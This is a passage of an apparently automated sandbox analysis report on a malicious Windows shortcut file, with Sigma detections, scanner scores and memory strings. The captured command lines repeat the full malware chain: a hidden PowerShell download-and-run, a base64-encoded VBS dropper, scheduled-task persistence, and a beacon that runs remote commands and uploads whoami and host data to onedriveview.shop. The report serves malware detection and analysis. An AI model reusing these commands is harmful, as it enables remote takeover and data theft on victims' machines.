c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, ProcessId: 7340, ProcessName: schtasks.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 7416, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7548, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: XnQmVRj5g0.lnkReversingLabs: Detection: 31%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Machine Learning detection for sample
              Source: XnQmVRj5g0.lnkJoe Sandbox ML: detected
              Source: Binary string: System.pdb3i source: powershell.exe, 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A6080000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000010.00000002.2362588209.00000217A6246000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A6076000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BFC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb. source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pDBY5 source: powershell.exe, 00000001.00000002.1369152168.00007FFAACB50000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.pdb source: powershell.exe, 00000010.00000002.2360286566.00000217A5FE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1342272540.00000219F7C73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2699350373.000001E242BDE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000010.00000002.2362588209.00000217A6246000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdbrXr source: powershell.exe, 00000010.00000002.2360286566.00000217A6076000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbd source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 23.41.168.139 23.41.168.139
              Source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 0000001B.00000002.2701840163.000001E242DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: powershell.exe, 0000001B.00000002.2658656150.000001E2289E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: svchost.exe, 0000000E.00000002.2729773734.000001FC96400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000001.00000002.1334636017.00000219EFB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1334636017.00000219EFC93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DB56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1318527100.00000219E112D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F1B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B1F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onedriveview.shop
              Source: powershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1318527100.00000219DFAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0004B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1343824734.00000219F7E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coi
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
              Source: powershell.exe, 00000001.00000002.1318527100.00000219DFAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178DAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A6FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22A70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD00062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
